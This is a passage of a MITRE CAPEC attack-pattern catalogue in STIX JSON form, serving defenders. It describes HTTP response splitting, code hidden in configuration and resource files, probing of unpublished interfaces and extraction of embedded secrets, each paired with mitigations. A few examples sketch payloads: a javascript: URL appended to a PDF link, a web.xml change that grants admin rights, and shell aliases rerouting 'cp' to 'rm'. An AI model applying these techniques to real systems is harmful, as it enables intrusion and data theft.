  1. Perform HTTP Response Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

  2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.\n A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise aclient agent (e.g., web browser)by sending malicious content in HTTP responses from back-end HTTP infrastructure.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. 
HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e" + ], + "x_capec_prerequisites": [ + "A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server's response to target HTTP agents (e.g., proxies and users' web browsers).", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1e771e5-938f-4d0e-932e-1692f77db9a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3673e571-3d09-4ddf-9967-8a14983e4523", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--38c9102d-b93d-4484-8efb-aa67b53572c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c7c66359-57b8-4f29-8d2b-5d5ef075f5f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e76fd999-0f43-460b-95fb-cb047a2a7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23a58aa1-dfcb-4295-a673-b44c0cba6264", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4993c4a-c91f-4a57-9f21-3fe59ccbe5c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d73cbb1d-c8db-4b8e-8ae6-32f0d436b1d5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.", + "external_references": [ + { + "external_id": "CAPEC-35", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/35.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-95", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/282.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Obfuscated Files or Information: HTML Smuggling", + "external_id": "T1027.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/006" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + 
"source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + }, + { + "description": "Hide Artifacts: Resource Forking", + "external_id": "T1564.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1564/009" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Leverage Executable Code in Non-Executable Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. 
If the aliases are changed, then a standard Unix \"cp\" command can be rerouted to \"rm\" or other standard command so the user's intention is subverted.", + "The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.", + "\n Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)\n http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here\n The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.\n ", + "\n The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \"public\" grants all users with the public role the ability to use the administration functionality.\n < security-constraint>Security processing rules for admin screens/admin/*POSTGETadministratorpublic\n \n \n \n The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb" + ], + "x_capec_prerequisites": [ + "The attacker must have the ability to modify non-executable files consumed by the target software." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. 
Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1200590e-b7be-4a04-ba62-ad7e096eb725", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bc84555-2eda-4653-91db-ab12268de92f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56425426-27c4-48cd-b76a-d1b3019fa7ab", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.", + "id": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6e454f6-6551-4cd7-9eab-0d1493966d59", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. 
not allowed to execute.", + "id": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96960c02-bdf9-412d-94b3-3cc4487c9b4f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. 
If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.", + "external_references": [ + { + "external_id": "CAPEC-36", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/36.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-695", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + } + ], + "id": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unpublished Interfaces or Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one's own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google's business model. Most organizations, however, do not have the same business model. 
Organizations publishing services usually fall back on thoughts that Attackers \"will not know services exist\" and that \"even if they did, they wouldn't be able to access them because they're not on the local LAN.\" Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify services: Discover a service of interest by exploring service registry listings or by connecting on a known port or some similar means.

  2. Techniques
    Search via internet for known, published services.
    Use automated tools to scan known ports to identify internet-enabled services.
    Dump the code from the chip and then perform reverse engineering to analyze the code.
  3. Authenticate to service: Authenticate to the service, if required, in order to explore it.

  4. Techniques
    Use published credentials to access system.
    Find unpublished credentials to access service.
    Use other attack pattern or weakness to bypass authentication.
  5. Identify all interfaces: Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.

  6. Techniques
    For any published services, determine exposed interfaces via the documentation provided.
    For any services found, use error messages from poorly formed service calls to determine valid interfaces. In some cases, services will respond to poorly formed calls with valid ones.

Experiment

  1. Attempt to discover unpublished functions: Using manual or automated means, discover unpublished or undocumented functions exposed by the service.

  2. Techniques
    Manually attempt calls to the service using an educated guess approach, including the use of terms like' 'test', 'debug', 'delete', etc.
    Use automated tools to scan the service to attempt to reverse engineer exposed, but undocumented, features.

Exploit

  1. Exploit unpublished functions: Using information determined via experimentation, exploit the unpublished features of the service.

  2. Techniques
    Execute features that are not intended to be used by general system users.
    Craft malicious calls to features not intended to be used by general system users that take advantage of security flaws found in the functions.
", + "x_capec_extended_description": "Adversaries can also search for undocumented bits on a hardware device, commonly known as \"chicken bits\". These bits are used to enable/disable certain functionality, but are not published. Adversaries can reverse engineer firmware to identify hidden features and change these bits at runtime to achieve malicious behavior.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The architecture under attack must publish or otherwise make available services that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be 'discoverable', but in the event it isn't it must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Web service digging tools may be helpful." + ], + "x_capec_skills_required": { + "Low": "A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that they can sniff/monitor for." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. 
Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like.", + "id": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-36-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa411755-d981-4b14-9dbc-aed949041db7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker examines a target system to find sensitive data that has been embedded within it. 
This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.", + "external_references": [ + { + "external_id": "CAPEC-37", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/37.html" + }, + { + "external_id": "CWE-226", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-525", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/525.html" + }, + { + "external_id": "CWE-312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/312.html" + }, + { + "external_id": "CWE-314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/314.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1301.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, 
+ { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + } + ], + "id": "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Retrieve Embedded Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be.", + "An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.", + "Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.

  2. Techniques
    Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
    Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack.

Exploit

  1. Retrieve Embedded Data: The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to retrieve the information of interest.

  2. Techniques
    API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information.
    Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.
    Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.
    Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "In order to feasibly execute this type of attack, some valuable data must be present in client software.", + "Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack." + ], + "x_capec_resources_required": [ + "The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as \"Strings\" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources." + ], + "x_capec_skills_required": { + "Medium": "The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. 
